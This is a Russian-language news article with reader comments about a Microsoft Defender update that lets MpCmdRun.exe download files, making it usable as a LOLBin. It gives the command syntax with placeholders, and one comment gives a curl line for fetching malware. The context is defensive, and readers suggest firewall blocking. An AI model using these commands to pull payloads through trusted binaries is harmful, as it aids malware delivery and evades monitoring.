Последнее обновление антивируса Microsoft Defender для Windows 10 позволяет ему загружать вредоносные программы и другие файлы на компьютер с Windows.
В недавнем патче инструмент командной строки MpCmdRun.exe был обновлён и получил возможность загрузки файлов из удалённого местоположения, что может быть использовано злоумышленниками.
Благодаря этой новой функции Защитник Windows теперь входит в длинный список программ, которыми интересуются злоумышленники, ведь его можно использовать как LOLBin (так называются легитимные системные компоненты, которые используются в злонамеренных целях).
Обнаруженное исследователем безопасности Мохаммадом Аскаром недавнее обновление инструмента командной строки Защитника добавило новый аргумент DownloadFile в версию 4.18.2007.9 или 4.18.2009.9.
Эта директива позволяет локальному пользователю использовать служебную программу командной строки Microsoft Antimalware Service (MpCmdRun.exe) для загрузки файла из удалённого местоположения с помощью следующей команды:
MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]
Как вы можете видеть ниже, Мохаммад смог загрузить файл resources.exe, который представлял собой образец программы-вымогателя WastedLocker, используемый в последнее время для атаки на производителя GPS-навигационной техники и умных часов Garmin.
Хорошая новость заключается в том, что Защитник Windows обнаруживает вредоносные файлы, загруженные с помощью MpCmdRun.exe, но неизвестно, позволит ли другое антивирусное программное обеспечение обходить их обнаружения.
Так администраторы компьютера получили дополнительный исполняемый файл Windows, который необходимо отслеживать, чтобы он не использовался во вред.
Я добавил правило в брандмауэр защитника Windows, чтобы блокировать соединение MpCmdRun.exe, чтобы его нельзя было использовать для загрузки вредоносных программ.
Нету здесь ничего страшного. Встроенная во все ОС программа cURL умеет получать файлы из Интернета, а с помощью команды «curl ссылка.с.вашим.вирусом > virus.exe» можно как раз таки скачать малварь.
Но в любом случае скачанный файл будет детектиться антивирусами, может быть даже и Защитником Windows.
Хотя если этот MpCmdRun может и в системные каталоги изменять, тогда это серьёзная уязвимость…
Кстати, redwolf написал полезный комментарий — действительно, можно брандмауэром закрыть доступ MpCmdRun’у в инет. Правда, неизвестно, как это скажется на работе самого Защитника…